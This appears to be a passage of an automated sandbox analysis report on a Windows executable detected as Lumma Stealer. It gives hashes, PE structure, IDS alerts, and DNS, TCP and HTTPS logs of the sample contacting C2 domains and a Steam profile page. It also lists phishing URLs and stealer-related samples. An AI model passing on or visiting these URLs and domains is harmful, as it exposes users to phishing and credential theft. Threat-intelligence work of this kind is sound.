                                                                                                                  http://www.airpsite.cyou/pdw/Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.223.131
                                                                                                                  https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.64.150.63
                                                                                                                  https://meta.manager-activity-central.com/264177933446578Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  https://secureglobalrevvards.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 188.114.96.3
                                                                                                                  https://pub-e1951423ad66484c81fdf62e924a922a.r2.dev/m990.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  https://ghjhyu.wixsite.com/my-site-1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 172.66.0.227
                                                                                                                  Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                                  • 172.67.206.204
                                                                                                                  https://via291.activehosted.com/f/1sis.php/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 104.17.31.174
                                                                                                                  setup_installer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  AKAMAI-ASUSSetup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  msvcp110.dllGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  Launch.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1https://lynwoodgrove.com/Comerica/file/prohqcker1.phpGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  msvcp110.dllGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  Launch.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                  • 104.102.49.254
                                                                                                                  • 172.67.206.204

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  No created / dropped files found

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.947212762617919
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:file.exe
                                                                                                                  File size:1'830'400 bytes
                                                                                                                  MD5:30da1d41d3aef9c33749c840ae2343b8
                                                                                                                  SHA1:76257e255e89334abfeeb8afe10d5adecbbd91c4
                                                                                                                  SHA256:c24402c282bbbf1c45d3778beb440d39d4980179e8a923911949875f12d51dba
                                                                                                                  SHA512:80098ad8eec493366dce5f6d936bb367b51d6305e29679c4e35c0731287c73cf0b015e238cffae7333b0700cc2a8a7e96a2b34823d876ccf1d31b31775f05585
                                                                                                                  SSDEEP:49152:KSMtl3bhMifqlahvV1SZg4D4ZIhuG0AF1Q:YtlKUbV4VEmcGvF1
                                                                                                                  TLSH:4D853323CCAB86BDD42B8DB9DCB3118C0C69DC58142A9647AC13A5E1D4B67C6F121FDB
                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................pI...........@...........................I...........@.................................W...k..

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x897000
                                                                                                                  Entrypoint Section:.taggant
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp 00007F6550BCAA7Ah
                                                                                                                  bswap esp
                                                                                                                  sbb eax, dword ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  jmp 00007F6550BCCA75h
                                                                                                                  add byte ptr [esi], al
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax+0Ah], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  or byte ptr [eax+00000000h], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  adc byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  pop es
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], dh
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  or byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [ecx], al
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  adc byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  pop es
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], dh
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], cl
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  adc byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  pop es
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], dl
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [edx], al
                                                                                                                  or al, byte ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [esi], al
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  0x10000x5d0000x25e0032198c5347443126f39772da8d5a437eFalse0.9996067966171617data7.984430674001358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  0x600000x2a00000x2008c62da60eaa4e6dd497b75640c190245unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  wwrljzle0x3000000x1960000x1956005f93c24f7927849c7c67675841cecb84False0.9941454430696886data7.95266308333564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  uvlyxxks0x4960000x10000x400a73038f5328a83f917eda8bc139078e9False0.7646484375data5.996457858343531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .taggant0x4970000x30000x2200004bf6540c73f8209b8726fedefc528eFalse0.06548713235294118DOS executable (COM)0.8184013860910203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  kernel32.dlllstrcpy

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-10-06T18:42:06.161629+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7633841.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.175919+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7609691.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.187436+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7504611.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.201064+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7604011.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.231857+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7506051.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.251897+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7504901.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.262603+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7602951.1.1.153UDP
                                                                                                                  2024-10-06T18:42:06.278538+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7510731.1.1.153UDP
                                                                                                                  2024-10-06T18:42:08.659562+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749701172.67.206.204443TCP
                                                                                                                  2024-10-06T18:42:08.659562+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.206.204443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 6, 2024 18:42:06.306014061 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:06.306024075 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.306086063 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:06.309356928 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:06.309365988 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.972084045 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.972178936 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:06.977377892 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:06.977381945 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.977891922 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.029627085 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.050065041 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.095401049 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455288887 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455343962 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455364943 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455401897 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.455416918 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455435991 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455436945 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.455463886 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.455523014 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.455523014 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.455533981 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.498359919 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.555207014 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.555237055 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.555283070 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.555284977 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.555313110 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.555318117 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.555336952 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.555341959 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.555733919 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.560467958 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.560542107 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.560560942 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.560617924 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.560627937 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.560714006 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.561312914 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.564789057 CEST49700443192.168.2.7104.102.49.254
                                                                                                                  Oct 6, 2024 18:42:07.564805984 CEST44349700104.102.49.254192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.587821007 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:07.587893009 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.587992907 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:07.588371038 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:07.588392973 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.079180956 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.079246998 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.082334042 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.082345963 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.082673073 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.084566116 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.084609032 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.084698915 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.659641981 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.659853935 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.660058975 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.668298006 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.668298006 CEST49701443192.168.2.7172.67.206.204
                                                                                                                  Oct 6, 2024 18:42:08.668320894 CEST44349701172.67.206.204192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:08.668333054 CEST44349701172.67.206.204192.168.2.7

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 6, 2024 18:42:06.161628962 CEST6338453192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.171314001 CEST53633841.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.175919056 CEST6096953192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.185481071 CEST53609691.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.187436104 CEST5046153192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.197726011 CEST53504611.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.201064110 CEST6040153192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.223499060 CEST53604011.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.231857061 CEST5060553192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.241293907 CEST53506051.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.251897097 CEST5049053192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.259963989 CEST53504901.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.262603045 CEST6029553192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.276041985 CEST53602951.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.278537989 CEST5107353192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.288882017 CEST53510731.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:06.293539047 CEST6459553192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:06.300360918 CEST53645951.1.1.1192.168.2.7
                                                                                                                  Oct 6, 2024 18:42:07.572757006 CEST5807653192.168.2.71.1.1.1
                                                                                                                  Oct 6, 2024 18:42:07.583609104 CEST53580761.1.1.1192.168.2.7

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 6, 2024 18:42:06.161628962 CEST192.168.2.71.1.1.10x97aeStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.175919056 CEST192.168.2.71.1.1.10x2936Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.187436104 CEST192.168.2.71.1.1.10x1396Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.201064110 CEST192.168.2.71.1.1.10x32bbStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.231857061 CEST192.168.2.71.1.1.10x7b80Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.251897097 CEST192.168.2.71.1.1.10x2a98Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.262603045 CEST192.168.2.71.1.1.10xb321Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.278537989 CEST192.168.2.71.1.1.10xcdbaStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.293539047 CEST192.168.2.71.1.1.10x73f3Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:07.572757006 CEST192.168.2.71.1.1.10x359dStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 6, 2024 18:42:06.171314001 CEST1.1.1.1192.168.2.70x97aeName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.185481071 CEST1.1.1.1192.168.2.70x2936Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.197726011 CEST1.1.1.1192.168.2.70x1396Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.223499060 CEST1.1.1.1192.168.2.70x32bbName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.241293907 CEST1.1.1.1192.168.2.70x7b80Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.259963989 CEST1.1.1.1192.168.2.70x2a98Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.276041985 CEST1.1.1.1192.168.2.70xb321Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.288882017 CEST1.1.1.1192.168.2.70xcdbaName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:06.300360918 CEST1.1.1.1192.168.2.70x73f3No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:07.583609104 CEST1.1.1.1192.168.2.70x359dNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                  Oct 6, 2024 18:42:07.583609104 CEST1.1.1.1192.168.2.70x359dNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • steamcommunity.com
                                                                                                                  • sergei-esenin.com

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.749700104.102.49.2544435748C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-06 16:42:07 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Host: steamcommunity.com
                                                                                                                  2024-10-06 16:42:07 UTC1870INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Date: Sun, 06 Oct 2024 16:42:07 GMT
                                                                                                                  Content-Length: 34837
                                                                                                                  Connection: close
